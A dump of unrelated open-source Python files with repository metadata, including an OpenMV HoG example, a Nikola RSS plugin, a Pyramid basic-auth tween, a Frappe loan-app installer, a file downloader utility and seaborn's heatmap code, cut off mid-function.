file_name = 'NR_CC{:d}_BW_{:.0f}M_SCS_{:.0f}k_Mod_{:s}.tdms'.format(
num_carriers, bandwidth / 1e6, scs / 1e3, modulation.name)
wfm_path = wc.create(nrw, file_name)
| 45 | 114 | 0.621652 |
32fa2c5ab8bd9ec130f35ee7485dba6e73b151ff | 639 | py | Python | scripts/examples/Arduino/Nicla-Vision/09-Feature-Detection/hog.py | BreederBai/openmv | cb1a97198533dd1201ba8356d1c2f3835b48a347 | ["MIT"] | null | null | null | scripts/examples/Arduino/Nicla-Vision/09-Feature-Detection/hog.py | BreederBai/openmv | cb1a97198533dd1201ba8356d1c2f3835b48a347 | ["MIT"] | 3 | 2022-03-14T07:15:42.000Z | 2022-03-31T02:52:21.000Z | scripts/examples/Arduino/Nicla-Vision/09-Feature-Detection/hog.py | BreederBai/openmv | cb1a97198533dd1201ba8356d1c2f3835b48a347 | ["MIT"] | null | null | null |
# Histogram of Oriented Gradients (HoG) Example
#
# This example demonstrates HoG visualization.
#
# Note: Due to JPEG artifacts, the HoG visualization looks blurry. To see the
# image without JPEG artifacts, uncomment the lines that save the image to uSD.
import sensor, image, time
sensor.reset()
sensor.set_framesize(sensor.QVGA)
sensor.set_pixformat(sensor.GRAYSCALE)
sensor.skip_frames(time = 2000)
clock = time.clock() # Tracks FPS.
while (True):
clock.tick()
img = sensor.snapshot()
img.find_hog()
# Uncomment to save raw FB to file and exit the loop
#img.save("/hog.pgm")
#break
print(clock.fps())
| 24.576923 | 79 | 0.719875 |
a9fad7ba6060330d7a0c46a3e463b5ddc871aceb | 7,143 | py | Python | nikola/plugins/task/rss.py | pellenilsson/nikola | 67a944a40b35584525a1bb363b3abd85582704cb | ["MIT"] | null | null | null | nikola/plugins/task/rss.py | pellenilsson/nikola | 67a944a40b35584525a1bb363b3abd85582704cb | ["MIT"] | null | null | null | nikola/plugins/task/rss.py | pellenilsson/nikola | 67a944a40b35584525a1bb363b3abd85582704cb | ["MIT"] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright © 2012-2014 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals, print_function
import os
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin # NOQA
from nikola import utils
from nikola.plugin_categories import Task
class GenerateRSS(Task):
"""Generate RSS feeds."""
name = "generate_rss"
def set_site(self, site):
site.register_path_handler('rss', self.rss_path)
return super(GenerateRSS, self).set_site(site)
def gen_tasks(self):
"""Generate RSS feeds."""
kw = {
"translations": self.site.config["TRANSLATIONS"],
"filters": self.site.config["FILTERS"],
"blog_title": self.site.config["BLOG_TITLE"],
"site_url": self.site.config["SITE_URL"],
"blog_description": self.site.config["BLOG_DESCRIPTION"],
"output_folder": self.site.config["OUTPUT_FOLDER"],
"rss_teasers": self.site.config["RSS_TEASERS"],
"rss_plain": self.site.config["RSS_PLAIN"],
"show_untranslated_posts": self.site.config['SHOW_UNTRANSLATED_POSTS'],
"feed_length": self.site.config['FEED_LENGTH'],
"tzinfo": self.site.tzinfo,
"rss_read_more_link": self.site.config["RSS_READ_MORE_LINK"],
"rss_links_append_query": self.site.config["RSS_LINKS_APPEND_QUERY"],
}
self.site.scan_posts()
# Check for any changes in the state of use_in_feeds for any post.
# Issue #934
kw['use_in_feeds_status'] = ''.join(
['T' if x.use_in_feeds else 'F' for x in self.site.timeline]
)
yield self.group_task()
for lang in kw["translations"]:
output_name = os.path.join(kw['output_folder'],
self.site.path("rss", None, lang))
deps = []
if kw["show_untranslated_posts"]:
posts = self.site.posts[:10]
else:
posts = [x for x in self.site.posts if x.is_translation_available(lang)][:10]
for post in posts:
deps += post.deps(lang)
feed_url = urljoin(self.site.config['BASE_URL'], self.site.link("rss", None, lang).lstrip('/'))
task = {
'basename': 'generate_rss',
'name': os.path.normpath(output_name),
'file_dep': deps,
'targets': [output_name],
'actions': [(utils.generic_rss_renderer,
(lang, kw["blog_title"](lang), kw["site_url"],
kw["blog_description"](lang), posts, output_name,
kw["rss_teasers"], kw["rss_plain"], kw['feed_length'], feed_url,
None, kw["rss_links_append_query"]))],
'task_dep': ['render_posts'],
'clean': True,
'uptodate': [utils.config_changed(kw)],
}
yield utils.apply_filters(task, kw['filters'])
def rss_path(self, name, lang):
return [_f for _f in [self.site.config['TRANSLATIONS'][lang],
self.site.config['RSS_PATH'], 'rss.xml'] if _f]
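# Illustrative behavior (values are examples): with TRANSLATIONS = {'en': ''}
# and RSS_PATH = '', the falsy components are filtered out above and the feed
# path resolves to just 'rss.xml'.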
| 41.673077 | 107 | 0.614905 |
adbf9dac85d51e26c24c07483e7bd8fe4bdede09 | 1,187 | py | Python | pyramid_handy/tweens/basic_auth.py | fangpenlin/pyramid-handy | e3cbc19224ab1f0a14aab556990bceabd2d1f658 | ["MIT"] | null | null | null | pyramid_handy/tweens/basic_auth.py | fangpenlin/pyramid-handy | e3cbc19224ab1f0a14aab556990bceabd2d1f658 | ["MIT"] | null | null | null | pyramid_handy/tweens/basic_auth.py | fangpenlin/pyramid-handy | e3cbc19224ab1f0a14aab556990bceabd2d1f658 | ["MIT"] | null | null | null |
from __future__ import unicode_literals
import base64
import binascii
def get_remote_user(request):
"""Parse basic HTTP_AUTHORIZATION and return user name
"""
if 'HTTP_AUTHORIZATION' not in request.environ:
return
authorization = request.environ['HTTP_AUTHORIZATION']
try:
authmeth, auth = authorization.split(' ', 1)
except ValueError: # not enough values to unpack
return
if authmeth.lower() != 'basic':
return
try:
auth = base64.b64decode(auth.strip().encode('latin1')).decode('latin1')
except (binascii.Error, TypeError): # can't decode
return
try:
login, password = auth.split(':', 1)
except ValueError: # not enough values to unpack
return
return login, password
def basic_auth_tween_factory(handler, registry):
"""Do basic authentication, parse HTTP_AUTHORIZATION and set remote_user
variable to request
"""
def basic_auth_tween(request):
remote_user = get_remote_user(request)
if remote_user is not None:
request.environ['REMOTE_USER'] = remote_user[0]
return handler(request)
return basic_auth_tween
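# Illustrative wiring (the dotted path is an assumption based on this module's
# location, not something this file declares):
#   config.add_tween('pyramid_handy.tweens.basic_auth.basic_auth_tween_factory')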
| 28.261905 | 79 | 0.670598 |
be0baa53cc7bec20e3b5bd473ec706952b85454f | 2,802 | py | Python | mss_customization/install.py | sunhoww/mss_customization | c68dd6ac77a5072b756bd7aba1c4a3c9586cf4e9 | ["MIT"] | null | null | null | mss_customization/install.py | sunhoww/mss_customization | c68dd6ac77a5072b756bd7aba1c4a3c9586cf4e9 | ["MIT"] | null | null | null | mss_customization/install.py | sunhoww/mss_customization | c68dd6ac77a5072b756bd7aba1c4a3c9586cf4e9 | ["MIT"] | 1 | 2018-03-15T13:49:35.000Z | 2018-03-15T13:49:35.000Z |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import frappe
settings_accounts = {
'loan_account': {
'account_name': 'Loans on Collateral',
'parent_account': 'Loans and Advances (Assets)',
},
'interest_income_account': {
'account_name': 'Interests on Loans',
'account_type': 'Income Account',
'parent_account': 'Direct Income',
},
'foreclosed_collateral_account': {
'account_name': 'Foreclosed Collateral',
'parent_account': 'Stock Assets',
},
}
def _create_account(doc, company_name, company_abbr):
account = frappe.get_doc({
'doctype': 'Account',
'account_name': doc['account_name'],
'parent_account': "{} - {}".format(
doc['parent_account'], company_abbr
),
'is_group': 0,
'company': company_name,
'account_type': doc.get('account_type'),
}).insert(ignore_if_duplicate=True)
return account.name
def before_tests():
frappe.clear_cache()
if not frappe.db.exists('Company', '_Test Company'):
return
settings = frappe.get_single('MSS Loan Settings')
settings.update({
'months_to_foreclosure': 10,
'mode_of_payment': 'Cash',
})
if frappe.db.exists('Cost Center', 'Main - _TC'):
settings.update({
'cost_center': 'Main - _TC',
})
for key, value in settings_accounts.items():
settings.update({
key: _create_account(value, '_Test Company', '_TC'),
})
settings.save()
frappe.db.commit()
def after_install():
df = frappe.get_meta('Journal Entry Account').get_field('reference_type')
if '\nGold Loan' not in df.options:
doc = frappe.new_doc('Property Setter')
value = df.options + '\nGold Loan'
doc.update({
'doc_type': 'Journal Entry Account',
'doctype_or_field': 'DocField',
'field_name': 'reference_type',
'property': 'options',
'property_type': 'Text',
'value': value
})
doc.insert(ignore_permissions=True)
def after_wizard_complete(args=None):
"""
Create new accounts and set Loan Settings.
"""
if frappe.defaults.get_global_default('country') != "India":
return
settings = frappe.get_doc('MSS Loan Settings', None)
settings.update({
'mode_of_payment': 'Cash',
'cost_center': frappe.db.get_value(
'Company', args.get('company_name'), 'cost_center'
),
})
for key, value in settings_accounts.items():
account_name = _create_account(
value,
args.get('company_name'),
args.get('company_abbr')
)
settings.update({key: account_name})
settings.save()
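# These entry points are typically wired up in the app's hooks.py; an
# illustrative sketch (hook names assumed, not declared in this file):
#   after_install = "mss_customization.install.after_install"
#   setup_wizard_complete = "mss_customization.install.after_wizard_complete"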
| 29.808511 | 77 | 0.592434 |
e86c7cb06f3f5a132b086eac50c8282f6b5444ee | 7,143 | py | Python | fastdl/downloader.py | r-salas/fastdl | 8bb63c8b9cf87b0ae7987ffd4b3ae25816007b43 | ["MIT"] | 3 | 2021-08-25T09:47:41.000Z | 2021-09-27T03:05:00.000Z | fastdl/downloader.py | r-salas/fastdl | 8bb63c8b9cf87b0ae7987ffd4b3ae25816007b43 | ["MIT"] | null | null | null | fastdl/downloader.py | r-salas/fastdl | 8bb63c8b9cf87b0ae7987ffd4b3ae25816007b43 | ["MIT"] | 1 | 2021-09-27T03:05:10.000Z | 2021-09-27T03:05:10.000Z |
#
#
# Downloader
#
#
import os
import warnings
from .config import conf
from .hasher import validate_file
from .extractor import extract_file, can_extract
from .utils import splitext, guess_extension, filename_from_url
from tqdm.auto import tqdm
from urllib.request import urlopen, Request
from urllib.error import ContentTooShortError
def download(url, fname=None, dir_prefix=None, subdir_prefix="", headers=None, content_disposition=False,
blocksize=1024 * 8, file_hash=None, hash_algorithm="auto", extract=False, extract_dir=None, timeout=None,
progressbar=True, force_download=False, force_extraction=False):
"""
Download files with support for extractions and hash validations.
Parameters
------------
url: str
Url to download
fname: str, optional
File name for the download file. If not provided, it will try to infer filename using
        info from the server or the URL. Can be an absolute path.
dir_prefix: str
Directory to download files (if `fname` is not an absolute path). By default, it will
download files to current working directory.
subdir_prefix: str
Subdirectory inside `dir_prefix` to store downloaded file.
Useful if configuration for "default_dir_prefix" is changed.
headers: dict, optional
        Dictionary of headers to send with the request.
content_disposition: bool
        Used only if `fname` is None. If true, try to infer the filename from the
        Content-Disposition header; if false, the URL is used to infer it.
blocksize: int
Response blocks to read / write for every iteration
file_hash: str, optional
File hash to validate file. If hash doesn't match, it will re-download file.
hash_algorithm: str
Hash algorithm to validate file. Currently supported: "sha256", "sha1", "sha512", "md5".
By default, it will try to infer algorithm according to the number of characters of the file
hash.
extract: bool
Whether or not the file should be extracted. The currently supported extensions are the
following: "zip", "tar", "tar.gz", "tar.bz2"
extract_dir: str
Directory to extract files. By default, the directory will be the same as the download file.
timeout: float, optional
Timeout for request.
progressbar: bool
Whether or not show progress bar.
    force_download: bool
        Whether or not to force the download if the file already exists.
    force_extraction: bool
        Whether or not to force extraction if the files already exist.
Returns
--------
file_path: str
Download file path
"""
if dir_prefix is None:
dir_prefix = conf["default_dir_prefix"]
fulldir_prefix = os.path.join(dir_prefix, subdir_prefix)
file_path = _urlretrieve(url, fname=fname, dir_prefix=fulldir_prefix, content_disposition=content_disposition,
headers=headers, blocksize=blocksize, progressbar=progressbar, file_hash=file_hash,
hash_algorithm=hash_algorithm, force_download=force_download, timeout=timeout)
if not extract:
return file_path
if extract_dir is None:
extract_dir, _ = splitext(file_path)
extract_dir = os.path.expanduser(extract_dir)
if not can_extract(file_path):
warnings.warn("`extract=True` but {} can't be extracted".format(file_path))
return file_path
extract_file(file_path, extract_dir, force=force_extraction, progressbar=progressbar)
return file_path
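# Illustrative call (hypothetical URL and hash; not part of the original module):
#   path = download('https://example.com/archive.zip', extract=True,
#                   file_hash='0123abcd...', hash_algorithm='sha256')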
def _warn_about_different_hash(file_hash, hash_algorithm):
warnings.warn("A local file was found, but it seems to be incomplete or outdated because the " +
hash_algorithm + " file hash does not match the original value of " + file_hash +
" so we will re-download the data.")
def _urlretrieve(url, fname=None, dir_prefix=".", headers=None, content_disposition=False, blocksize=1024 * 8,
timeout=None, progressbar=True, reporthook=None, file_hash=None, hash_algorithm="auto",
force_download=False):
"""
    A more advanced version of urllib.request.urlretrieve with support for
    progress bars, automatic file naming, caching, and file-hash validation
"""
if headers is None:
headers = {}
dir_prefix = os.path.expanduser(dir_prefix)
if fname is None and not content_disposition:
fname = filename_from_url(url)
# Check if file already exists before doing any request
if fname is not None and os.path.exists(os.path.join(dir_prefix, fname)) and not force_download:
if file_hash is not None and not validate_file(os.path.join(dir_prefix, fname), file_hash, hash_algorithm):
_warn_about_different_hash(file_hash, hash_algorithm)
else:
return os.path.join(dir_prefix, fname)
request = Request(url, headers=headers)
with urlopen(request, timeout=timeout) as response:
headers = response.info()
if callable(fname):
fname = fname(response)
if fname is None:
fname = headers.get_filename()
if fname is None:
fname = filename_from_url(url)
if os.path.isabs(fname):
file_path = fname
else:
os.makedirs(dir_prefix, exist_ok=True)
file_path = os.path.join(dir_prefix, fname)
_, extension = splitext(fname)
if not extension:
extension = guess_extension(headers.get_content_type() or "")
if extension is not None:
file_path += extension
if os.path.exists(file_path) and not force_download:
if file_hash is not None and not validate_file(file_path, file_hash, hash_algorithm):
_warn_about_different_hash(file_hash, hash_algorithm)
else:
return file_path
content_length = int(headers.get("Content-Length", -1))
blocknum = 0
bytes_read = 0
download_file_path = file_path + ".download"
with open(download_file_path, "wb") as fp, tqdm(total=content_length, unit='B', unit_scale=True, miniters=1,
unit_divisor=1024, desc="Downloading {}...".format(fname),
disable=not progressbar) as pbar:
while True:
block = response.read(blocksize)
if not block:
break
fp.write(block)
blocknum += 1
bytes_read += len(block)
            if pbar is not None:
                # Advance by the bytes actually read; the final block is
                # usually smaller than `blocksize`.
                pbar.update(len(block))
if reporthook is not None:
reporthook(blocknum, blocksize, content_length)
if content_length >= 0 and bytes_read < content_length:
error_msg = "retrieval incomplete: got only {} out of {} bytes".format(bytes_read, content_length)
raise ContentTooShortError(error_msg, (download_file_path, headers))
os.rename(download_file_path, file_path)
return file_path
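# Note the write pattern above: bytes stream into "<name>.download" and the
# temporary file is only renamed to its final path after the byte count checks
# out, so an interrupted transfer never leaves a truncated file behind.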
# -----------------------------------------------------------------------------
# Source file: seaborn/matrix.py (repo: vinayakreddy/seaborn, BSD-3-Clause)
# -----------------------------------------------------------------------------
"""Functions to visualize matrices of data."""
from __future__ import division
import itertools
import warnings
import matplotlib as mpl
from matplotlib.collections import LineCollection
import matplotlib.pyplot as plt
from matplotlib import gridspec
import numpy as np
import pandas as pd
from scipy.cluster import hierarchy
from . import cm
from .axisgrid import Grid
from .utils import (despine, axis_ticklabels_overlap, relative_luminance,
to_utf8)
__all__ = ["heatmap", "clustermap"]
def _index_to_label(index):
"""Convert a pandas index or multiindex to an axis label."""
if isinstance(index, pd.MultiIndex):
return "-".join(map(to_utf8, index.names))
else:
return index.name
def _index_to_ticklabels(index):
"""Convert a pandas index or multiindex into ticklabels."""
if isinstance(index, pd.MultiIndex):
return ["-".join(map(to_utf8, i)) for i in index.values]
else:
return index.values
def _convert_colors(colors):
"""Convert either a list of colors or nested lists of colors to RGB."""
to_rgb = mpl.colors.colorConverter.to_rgb
if isinstance(colors, pd.DataFrame):
# Convert dataframe
return pd.DataFrame({col: colors[col].map(to_rgb)
for col in colors})
elif isinstance(colors, pd.Series):
return colors.map(to_rgb)
else:
try:
to_rgb(colors[0])
# If this works, there is only one level of colors
return list(map(to_rgb, colors))
except ValueError:
# If we get here, we have nested lists
return [list(map(to_rgb, l)) for l in colors]
def _matrix_mask(data, mask):
"""Ensure that data and mask are compatabile and add missing values.
Values will be plotted for cells where ``mask`` is ``False``.
``data`` is expected to be a DataFrame; ``mask`` can be an array or
a DataFrame.
"""
    if mask is None:
        mask = np.zeros(data.shape, bool)
if isinstance(mask, np.ndarray):
# For array masks, ensure that shape matches data then convert
if mask.shape != data.shape:
raise ValueError("Mask must have the same shape as data.")
        mask = pd.DataFrame(mask,
                            index=data.index,
                            columns=data.columns,
                            dtype=bool)
elif isinstance(mask, pd.DataFrame):
# For DataFrame masks, ensure that semantic labels match data
        if not (mask.index.equals(data.index)
                and mask.columns.equals(data.columns)):
            err = "Mask must have the same index and columns as data."
            raise ValueError(err)
# Add any cells with missing data to the mask
# This works around an issue where `plt.pcolormesh` doesn't represent
# missing data properly
mask = mask | pd.isnull(data)
return mask
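# A quick illustration of _matrix_mask (hypothetical data): cells that are
# either masked by the caller *or* missing in `data` come out True.
#
#   df = pd.DataFrame([[1.0, np.nan], [3.0, 4.0]])
#   m = _matrix_mask(df, np.array([[True, False], [False, False]]))
#   # m:  True   True    <- (0, 1) was NaN, so it is masked as well
#   #     False  False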
class _HeatMapper(object):
"""Draw a heatmap plot of a matrix with nice labels and colormaps."""
def __init__(self, data, vmin, vmax, cmap, center, robust, annot, fmt,
annot_kws, cbar, cbar_kws,
xticklabels=True, yticklabels=True, mask=None):
"""Initialize the plotting object."""
# We always want to have a DataFrame with semantic information
# and an ndarray to pass to matplotlib
if isinstance(data, pd.DataFrame):
plot_data = data.values
else:
plot_data = np.asarray(data)
data = pd.DataFrame(plot_data)
        # Validate the mask and convert to DataFrame
mask = _matrix_mask(data, mask)
plot_data = np.ma.masked_where(np.asarray(mask), plot_data)
# Get good names for the rows and columns
xtickevery = 1
if isinstance(xticklabels, int):
xtickevery = xticklabels
xticklabels = _index_to_ticklabels(data.columns)
elif xticklabels is True:
xticklabels = _index_to_ticklabels(data.columns)
elif xticklabels is False:
xticklabels = []
ytickevery = 1
if isinstance(yticklabels, int):
ytickevery = yticklabels
yticklabels = _index_to_ticklabels(data.index)
elif yticklabels is True:
yticklabels = _index_to_ticklabels(data.index)
elif yticklabels is False:
yticklabels = []
# Get the positions and used label for the ticks
nx, ny = data.T.shape
if not len(xticklabels):
self.xticks = []
self.xticklabels = []
elif isinstance(xticklabels, str) and xticklabels == "auto":
self.xticks = "auto"
self.xticklabels = _index_to_ticklabels(data.columns)
else:
self.xticks, self.xticklabels = self._skip_ticks(xticklabels,
xtickevery)
if not len(yticklabels):
self.yticks = []
self.yticklabels = []
elif isinstance(yticklabels, str) and yticklabels == "auto":
self.yticks = "auto"
self.yticklabels = _index_to_ticklabels(data.index)
else:
self.yticks, self.yticklabels = self._skip_ticks(yticklabels,
ytickevery)
# Get good names for the axis labels
xlabel = _index_to_label(data.columns)
ylabel = _index_to_label(data.index)
self.xlabel = xlabel if xlabel is not None else ""
self.ylabel = ylabel if ylabel is not None else ""
# Determine good default values for the colormapping
self._determine_cmap_params(plot_data, vmin, vmax,
cmap, center, robust)
# Sort out the annotations
if annot is None or annot is False:
annot = False
annot_data = None
else:
if isinstance(annot, bool):
annot_data = plot_data
else:
annot_data = np.asarray(annot)
if annot_data.shape != plot_data.shape:
err = "`data` and `annot` must have same shape."
raise ValueError(err)
annot = True
# Save other attributes to the object
self.data = data
self.plot_data = plot_data
self.annot = annot
self.annot_data = annot_data
self.fmt = fmt
self.annot_kws = {} if annot_kws is None else annot_kws.copy()
self.cbar = cbar
self.cbar_kws = {} if cbar_kws is None else cbar_kws.copy()
def _determine_cmap_params(self, plot_data, vmin, vmax,
cmap, center, robust):
"""Use some heuristics to set good defaults for colorbar and range."""
calc_data = plot_data.data[~np.isnan(plot_data.data)]
if vmin is None:
vmin = np.percentile(calc_data, 2) if robust else calc_data.min()
if vmax is None:
vmax = np.percentile(calc_data, 98) if robust else calc_data.max()
self.vmin, self.vmax = vmin, vmax
# Choose default colormaps if not provided
if cmap is None:
if center is None:
self.cmap = cm.rocket
else:
self.cmap = cm.icefire
elif isinstance(cmap, str):
self.cmap = mpl.cm.get_cmap(cmap)
elif isinstance(cmap, list):
self.cmap = mpl.colors.ListedColormap(cmap)
else:
self.cmap = cmap
# Recenter a divergent colormap
if center is not None:
# Copy bad values
# in mpl<3.2 only masked values are honored with "bad" color spec
# (see https://github.com/matplotlib/matplotlib/pull/14257)
bad = self.cmap(np.ma.masked_invalid([np.nan]))[0]
# under/over values are set for sure when cmap extremes
# do not map to the same color as +-inf
under = self.cmap(-np.inf)
over = self.cmap(np.inf)
under_set = under != self.cmap(0)
over_set = over != self.cmap(self.cmap.N - 1)
vrange = max(vmax - center, center - vmin)
            normalize = mpl.colors.Normalize(center - vrange, center + vrange)
            cmin, cmax = normalize([vmin, vmax])
cc = np.linspace(cmin, cmax, 256)
self.cmap = mpl.colors.ListedColormap(self.cmap(cc))
self.cmap.set_bad(bad)
if under_set:
self.cmap.set_under(under)
if over_set:
self.cmap.set_over(over)
def _annotate_heatmap(self, ax, mesh):
"""Add textual labels with the value in each cell."""
mesh.update_scalarmappable()
height, width = self.annot_data.shape
xpos, ypos = np.meshgrid(np.arange(width) + .5, np.arange(height) + .5)
for x, y, m, color, val in zip(xpos.flat, ypos.flat,
mesh.get_array(), mesh.get_facecolors(),
self.annot_data.flat):
if m is not np.ma.masked:
lum = relative_luminance(color)
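                # Light cells (high luminance) get dark text and dark cells
                # get white text, so annotations stay readable on any colormap.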
text_color = ".15" if lum > .408 else "w"
annotation = ("{:" + self.fmt + "}").format(val)
text_kwargs = dict(color=text_color, ha="center", va="center")
text_kwargs.update(self.annot_kws)
ax.text(x, y, annotation, **text_kwargs)
def _skip_ticks(self, labels, tickevery):
"""Return ticks and labels at evenly spaced intervals."""
n = len(labels)
if tickevery == 0:
ticks, labels = [], []
elif tickevery == 1:
ticks, labels = np.arange(n) + .5, labels
else:
start, end, step = 0, n, tickevery
ticks = np.arange(start, end, step) + .5
labels = labels[start:end:step]
return ticks, labels
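    # For example (illustrative): with 6 labels and tickevery=2, _skip_ticks
    # returns ticks at [0.5, 2.5, 4.5] plus every second label, keeping the
    # cell-centered (+0.5) positioning while thinning a crowded axis.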
def _auto_ticks(self, ax, labels, axis):
"""Determine ticks and ticklabels that minimize overlap."""
transform = ax.figure.dpi_scale_trans.inverted()
bbox = ax.get_window_extent().transformed(transform)
size = [bbox.width, bbox.height][axis]
axis = [ax.xaxis, ax.yaxis][axis]
tick, = axis.set_ticks([0])
fontsize = tick.label1.get_size()
max_ticks = int(size // (fontsize / 72))
if max_ticks < 1:
return [], []
tick_every = len(labels) // max_ticks + 1
tick_every = 1 if tick_every == 0 else tick_every
ticks, labels = self._skip_ticks(labels, tick_every)
return ticks, labels
def plot(self, ax, cax, kws):
"""Draw the heatmap on the provided Axes."""
# Remove all the Axes spines
despine(ax=ax, left=True, bottom=True)
# Draw the heatmap
mesh = ax.pcolormesh(self.plot_data, vmin=self.vmin, vmax=self.vmax,
cmap=self.cmap, **kws)
# Set the axis limits
ax.set(xlim=(0, self.data.shape[1]), ylim=(0, self.data.shape[0]))
# Invert the y axis to show the plot in matrix form
ax.invert_yaxis()
# Possibly add a colorbar
if self.cbar:
cb = ax.figure.colorbar(mesh, cax, ax, **self.cbar_kws)
cb.outline.set_linewidth(0)
# If rasterized is passed to pcolormesh, also rasterize the
# colorbar to avoid white lines on the PDF rendering
if kws.get('rasterized', False):
cb.solids.set_rasterized(True)
# Add row and column labels
if isinstance(self.xticks, str) and self.xticks == "auto":
xticks, xticklabels = self._auto_ticks(ax, self.xticklabels, 0)
else:
xticks, xticklabels = self.xticks, self.xticklabels
if isinstance(self.yticks, str) and self.yticks == "auto":
yticks, yticklabels = self._auto_ticks(ax, self.yticklabels, 1)
else:
yticks, yticklabels = self.yticks, self.yticklabels
ax.set(xticks=xticks, yticks=yticks)
xtl = ax.set_xticklabels(xticklabels)
ytl = ax.set_yticklabels(yticklabels, rotation="vertical")
# Possibly rotate them if they overlap
if hasattr(ax.figure.canvas, "get_renderer"):
ax.figure.draw(ax.figure.canvas.get_renderer())
if axis_ticklabels_overlap(xtl):
plt.setp(xtl, rotation="vertical")
if axis_ticklabels_overlap(ytl):
plt.setp(ytl, rotation="horizontal")
# Add the axis labels
ax.set(xlabel=self.xlabel, ylabel=self.ylabel)
# Annotate the cells with the formatted values
if self.annot:
self._annotate_heatmap(ax, mesh)
def heatmap(data, vmin=None, vmax=None, cmap=None, center=None, robust=False,
annot=None, fmt=".2g", annot_kws=None,
linewidths=0, linecolor="white",
cbar=True, cbar_kws=None, cbar_ax=None,
square=False, xticklabels="auto", yticklabels="auto",
mask=None, ax=None, **kwargs):
"""Plot rectangular data as a color-encoded matrix.
This is an Axes-level function and will draw the heatmap into the
currently-active Axes if none is provided to the ``ax`` argument. Part of
this Axes space will be taken and used to plot a colormap, unless ``cbar``
is False or a separate Axes is provided to ``cbar_ax``.
Parameters
----------
data : rectangular dataset
2D dataset that can be coerced into an ndarray. If a Pandas DataFrame
is provided, the index/column information will be used to label the
columns and rows.
vmin, vmax : floats, optional
Values to anchor the colormap, otherwise they are inferred from the
data and other keyword arguments.
cmap : matplotlib colormap name or object, or list of colors, optional
The mapping from data values to color space. If not provided, the
default will depend on whether ``center`` is set.
center : float, optional
        The value at which to center the colormap when plotting divergent data.
Using this parameter will change the default ``cmap`` if none is
specified.
robust : bool, optional
If True and ``vmin`` or ``vmax`` are absent, the colormap range is
computed with robust quantiles instead of the extreme values.
annot : bool or rectangular dataset, optional
If True, write the data value in each cell. If an array-like with the
same shape as ``data``, then use this to annotate the heatmap instead
of the data. Note that DataFrames will match on position, not index.
fmt : string, optional
String formatting code to use when adding annotations.
annot_kws : dict of key, value mappings, optional
Keyword arguments for ``ax.text`` when ``annot`` is True.
linewidths : float, optional
Width of the lines that will divide each cell.
linecolor : color, optional
Color of the lines that will divide each cell.
cbar : boolean, optional
Whether to draw a colorbar.
cbar_kws : dict of key, value mappings, optional
Keyword arguments for `fig.colorbar`.
cbar_ax : matplotlib Axes, optional
Axes in which to draw the colorbar, otherwise take space from the
main Axes.
square : boolean, optional
If True, set the Axes aspect to "equal" so each cell will be
square-shaped.
xticklabels, yticklabels : "auto", bool, list-like, or int, optional
If True, plot the column names of the dataframe. If False, don't plot
the column names. If list-like, plot these alternate labels as the
xticklabels. If an integer, use the column names but plot only every
n label. If "auto", try to densely plot non-overlapping labels.
mask : boolean array or DataFrame, optional
If passed, data will not be shown in cells where ``mask`` is True.
Cells with missing values are automatically masked.
ax : matplotlib Axes, optional
Axes in which to draw the plot, otherwise use the currently-active
Axes.
kwargs : other keyword arguments
All other keyword arguments are passed to
:func:`matplotlib.axes.Axes.pcolormesh`.
Returns
-------
ax : matplotlib Axes
Axes object with the heatmap.
See also
--------
    clustermap : Plot a matrix using hierarchical clustering to arrange the
rows and columns.
Examples
--------
Plot a heatmap for a numpy array:
.. plot::
:context: close-figs
>>> import numpy as np; np.random.seed(0)
>>> import seaborn as sns; sns.set()
>>> uniform_data = np.random.rand(10, 12)
>>> ax = sns.heatmap(uniform_data)
Change the limits of the colormap:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(uniform_data, vmin=0, vmax=1)
Plot a heatmap for data centered on 0 with a diverging colormap:
.. plot::
:context: close-figs
>>> normal_data = np.random.randn(10, 12)
>>> ax = sns.heatmap(normal_data, center=0)
Plot a dataframe with meaningful row and column labels:
.. plot::
:context: close-figs
>>> flights = sns.load_dataset("flights")
>>> flights = flights.pivot("month", "year", "passengers")
>>> ax = sns.heatmap(flights)
Annotate each cell with the numeric value using integer formatting:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, annot=True, fmt="d")
Add lines between each cell:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, linewidths=.5)
Use a different colormap:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, cmap="YlGnBu")
Center the colormap at a specific value:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, center=flights.loc["January", 1955])
Plot every other column label and don't plot row labels:
.. plot::
:context: close-figs
>>> data = np.random.randn(50, 20)
>>> ax = sns.heatmap(data, xticklabels=2, yticklabels=False)
Don't draw a colorbar:
.. plot::
:context: close-figs
>>> ax = sns.heatmap(flights, cbar=False)
Use different axes for the colorbar:
.. plot::
:context: close-figs
>>> grid_kws = {"height_ratios": (.9, .05), "hspace": .3}
>>> f, (ax, cbar_ax) = plt.subplots(2, gridspec_kw=grid_kws)
>>> ax = sns.heatmap(flights, ax=ax,
... cbar_ax=cbar_ax,
... cbar_kws={"orientation": "horizontal"})
Use a mask to plot only part of a matrix
.. plot::
:context: close-figs
>>> corr = np.corrcoef(np.random.randn(10, 200))
>>> mask = np.zeros_like(corr)
>>> mask[np.triu_indices_from(mask)] = True
>>> with sns.axes_style("white"):
... f, ax = plt.subplots(figsize=(7, 5))
... ax = sns.heatmap(corr, mask=mask, vmax=.3, square=True)
"""
# Initialize the plotter object
plotter = _HeatMapper(data, vmin, vmax, cmap, center, robust, annot, fmt,
